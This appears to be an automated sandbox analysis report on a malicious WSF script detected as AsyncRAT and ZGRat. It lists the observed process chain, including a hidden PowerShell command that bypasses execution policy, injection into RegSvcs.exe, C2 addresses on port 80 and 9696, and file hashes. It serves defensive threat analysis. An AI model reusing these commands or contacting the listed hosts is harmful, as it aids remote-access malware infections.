Analysis Overview
SHA256
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Threat Level: Known bad
The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1) was found to be: Known bad.
Malicious Activity Summary
AsyncRat
ZGRat
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-23 12:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-23 12:29
Reported
2024-01-23 12:31
Platform
win7-20231215-en
Max time kernel
145s
Max time network
122s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Public\hich.bat" "
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
Files
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 25af3af8f786943d78326df1a84fd5df |
| SHA1 | 331aa1b11635d06c4ab3e292139e134c3f907113 |
| SHA256 | 6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a |
| SHA512 | d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp
| MD5 | ce37b88de003d46be6fb52b722efd721 |
| SHA1 | 9817eb666450d67d8d1a96ba8d99b760132bc856 |
| SHA256 | a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1 |
| SHA512 | f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada |
C:\Users\Public\hich.ps1
| MD5 | b13a273e32d5763a07d712e5209055fa |
| SHA1 | 633dd0e5f647fee13536f74247159cdb07d72273 |
| SHA256 | 2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486 |
| SHA512 | 8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-23 12:29
Reported
2024-01-23 12:31
Platform
win10v2004-20231215-en
Max time kernel
143s
Max time network
147s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4216 set thread context of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 103.157.81.185.in-addr.arpa | udp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.166.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| FR | 185.81.157.183:9696 | | tcp |
| FR | 185.81.157.183:9696 | | tcp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfaqiojb.kai.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4216-26-0x00007FF844390000-0x00007FF844E51000-memory.dmp
memory/4216-28-0x000001AAA3660000-0x000001AAA3670000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b66db53846de4860ca72a3e59b38c544 |
| SHA1 | 2202dc88e9cddea92df4f4e8d83930efd98c9c5a |
| SHA256 | b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030 |
| SHA512 | 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527 |
memory/4216-27-0x000001AAA3660000-0x000001AAA3670000-memory.dmp
C:\Users\Public\hich.ps1
| MD5 | 8469f5b76df0f510fe02b1eab0f57226 |
| SHA1 | 7ad6c79dc42aafd7b813353c8bdcb1204c376621 |
| SHA256 | a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279 |
| SHA512 | 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4 |